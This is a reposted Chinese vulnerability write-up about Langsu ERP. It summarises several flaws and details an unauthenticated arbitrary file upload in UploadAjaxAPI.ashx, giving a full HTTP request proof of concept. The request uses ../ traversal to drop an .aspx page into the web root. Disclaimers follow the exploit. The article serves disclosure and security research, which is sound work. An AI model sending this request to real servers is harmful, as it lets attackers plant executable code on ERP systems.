文章总结： 本文分析了朗速ERP存在的多处SQL注入、XSS、任意文件读取及上传漏洞。作者通过反编译定位漏洞成因，指出问题源于未鉴权接口与参数拼接，并提供了详细的复现POC。内容技术细节扎实，证实系统存在高危风险，建议用户立即排查并加强权限控制与输入过滤。 综合评分： 90 文章分类： 代码审计,漏洞分析,漏洞POC,WEB安全

文件上传2，Api/TinyMce/UploadAjaxAPI.ashx对应Lskj.Views.WebErp.dll，可上传aspx后缀文件、非图片后缀的文件保存到/fileRoot/tinymce/otherfile/目录下，文件名直接与保存路径拼接，可以通过 ../ 穿越到网站目录下，存在任意文件上传漏洞；

POST /Api/TinyMce/UploadAjaxAPI.ashx HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryqfHrEc8f5X9KnJUTContent-Length: 253
------WebKitFormBoundaryqfHrEc8f5X9KnJUTContent-Disposition: form-data; name="file"; filename="/../../../../abc.aspx"
<%@ Page&nbsp;Language="C#"&nbsp;%><%Response.Write(Guid.NewGuid().ToString());Response.End();%>------WebKitFormBoundaryqfHrEc8f5X9KnJUT--

免责声明：本文内容仅限于学习交流自查，旨在提高安全意识、加强安全防护。读者任何基于本文的操作均属个人行为，后果自负，与本文作者及本公众号无关。如有侵权请联系删除。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：sec0nd安全 《代码审计 | 朗速ERP漏洞分析》